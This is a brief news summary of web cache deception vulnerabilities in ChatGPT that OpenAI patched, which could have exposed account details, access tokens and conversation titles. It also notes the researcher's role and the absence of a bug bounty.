Last week, OpenAI, the creator of ChatGPT, patched multiple severe vulnerabilities that could have allowed attackers to take over user accounts and view conversations. The first was a critical web cache deception bug which could have allowed attackers to access user information such as names, emails, and access tokens. OpenAI’s API would fetch this data from the server. To exploit the vulnerability, an attacker could craft a .css path to the session endpoint and send the link to the victim.
Security researcher and CISO Ayoub Fathi then discovered a bypass method that could be used against another ChatGPT API, providing an attacker with access to a user’s conversation titles. This was another web cache deception attack and when the response was cached, the attacker could harvest the victim’s credentials and take over their account. Fathi worked with the OpenAI team to help them fully address all issues.
No bug bounty reward was issued to either researcher as OpenAI does not have a bug bounty program in place. The vulnerabilities were reported days after OpenAI took ChatGPT offline to address a vulnerability in an open-source Redis client library.
In conclusion, OpenAI identified and patched several severe vulnerabilities that could have allowed attackers to take over user accounts and view conversations. The first was a web cache deception bug and the second was a bypass method that provided access to a user’s conversation titles. OpenAI has not issued any bug bounty reward for the vulnerabilities.
Key Points:
- OpenAI patched multiple severe vulnerabilities that could have allowed attackers to take over user accounts and view conversations.
- The first vulnerability was a web cache deception bug and the second was a bypass method that provided access to a user’s conversation titles.
- OpenAI has not issued any bug bounty reward for the vulnerabilities.